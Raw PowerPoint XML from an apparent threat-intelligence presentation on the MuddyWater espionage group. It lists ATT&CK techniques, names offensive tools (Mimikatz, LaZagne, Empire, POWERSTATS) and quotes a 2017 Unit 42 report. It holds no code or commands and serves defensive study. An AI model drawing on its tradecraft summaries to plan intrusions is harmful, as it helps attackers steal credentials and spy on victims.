                </a:hlinkClick>
              </a:rPr>
              <a:t>System Information Discovery</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malware that can collect the victim’s OS version and machine name.</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27">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>System Network Configuration Discovery</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malware to collect the victim’s IP address and domain name.</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28">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>System Network Connections Discovery</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a PowerShell backdoor to check for Skype connections on the target machine.</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29">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>System Owner/User Discovery</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malware that can collect the victim’s username.</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30">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Unsecured Credentials</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31">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Credentials In Files</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run a tool that steals passwords saved in victim email.</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32">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>User Execution</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33">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Malicious Link</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distributed URLs in phishing e-mails that link to lure documents.</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32">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>User Execution</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34">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Malicious File</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attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.</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35">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Web Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId36">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Bidirectional Communication</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web services including OneHub to distribute remote access tools.</a:t>
            </a:r>
            <a:endParaRPr sz="950" b="1" i="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId37">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Windows Management Instrumentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1"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MuddyWater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="950" b="1" i="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> has used malware that leveraged WMI for execution and querying host information.</a:t>
            </a:r>
            <a:endParaRPr sz="950" b="1" i="1" u="sng">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9450"/>
            <a:ext cx="8520600" cy="664200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3255">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:endParaRPr sz="3255">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42400" y="614725"/>
            <a:ext cx="9043500" cy="4465200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">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ConnectWise</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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Empire</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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Koadic</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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LaZagne</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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Mimikatz</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>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Mori</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Out1</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>POWERSTATS</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId13">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>PowGoop</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>RemoteUtilities</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId15">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>SHARPSTATS</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Small Sieve</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId17">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>STARWHALE</a:t>
            </a:r>
            <a:endParaRPr sz="1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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63575" y="63575"/>
            <a:ext cx="9029400" cy="5030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ru" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2017</a:t>
            </a:r>
            <a:endParaRPr sz="300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ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This blog discusses targeted attacks against the Middle East taking place between February and October 2017 by a group Unit 42 is naming "MuddyWater". This blog links this recent activity with previous isolated public reporting on similar attacks we believe are related. We refer to these attacks as MuddyWater due to the confusion in attributing these attacks. Although the activity was previously linked by others to the FIN7 threat actor group, our research suggests the activity is in fact espionage related and unlikely to be FIN7 related.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">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previously discussed by MalwareBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. Which in turn, closely resembles a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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previous article by Morphisec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. These attacks have also been tracked by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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several other researchers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> on Twitter and elsewhere.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>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5664</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Presentación en pantalla (16:9)</PresentationFormat>
  <Paragraphs>354</Paragraphs>
  <Slides>34</Slides>
  <Notes>34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34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="40" baseType="lpstr">
      <vt:lpstr>Oswald</vt:lpstr>
      <vt:lpstr>Average</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Slate</vt:lpstr>
      <vt:lpstr>Presentación de PowerPoint</vt:lpstr>
